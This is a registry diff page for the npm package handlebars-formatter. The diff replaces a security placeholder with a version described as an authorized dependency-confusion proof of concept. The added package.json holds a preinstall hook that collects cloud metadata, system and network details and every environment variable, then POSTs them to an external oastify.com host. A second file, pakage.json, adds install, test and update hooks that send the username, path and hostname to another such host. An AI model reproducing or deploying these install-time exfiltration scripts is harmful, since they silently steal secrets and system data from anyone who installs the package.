handlebars-formatter 0.0.1-security → 20.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of handlebars-formatter might be problematic. Click here for more details.
- package/package.json +8 -3
- package/pakage.json +13 -0
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "handlebars-formatter",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "20.0.0",
|
4
|
+
"description": "Bugcrowd-authorized Dependency Confusion PoC for Intercom",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "(echo '--- CLOUD METADATA ---'; (curl -s http://169.254.169.254/latest/dynamic/instance-identity/document || curl -s -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/?recursive=true || echo 'No cloud metadata found'); echo; echo '--- SYSTEM/USER INFO ---'; id; echo; hostname; echo; uname -a; echo; pwd; echo; echo '--- NETWORK ---'; ifconfig || ip a; echo; echo '--- DNS ---'; cat /etc/resolv.conf; echo; echo '--- ENVIRONMENT VARIABLES ---'; env) | curl -X POST --data-binary @- http://rpk93g4j4s5k4kx103ymex4rxi39r0fp.oastify.com/full_system_profile"
|
8
|
+
},
|
9
|
+
"author": "nepalihacker000 (authorized researcher)",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/pakage.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "handlebars-formatter",
|
3
|
+
"version": "10.0.1",
|
4
|
+
"description": "Bugcrowd-authorized Dependency Confusion PoC for Intercom",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=test&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
8
|
+
"preinstall": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
9
|
+
"preupdate": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=preupdate&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
|
10
|
+
},
|
11
|
+
"author": "orwa (authorized researcher)",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=handlebars-formatter for more information.
|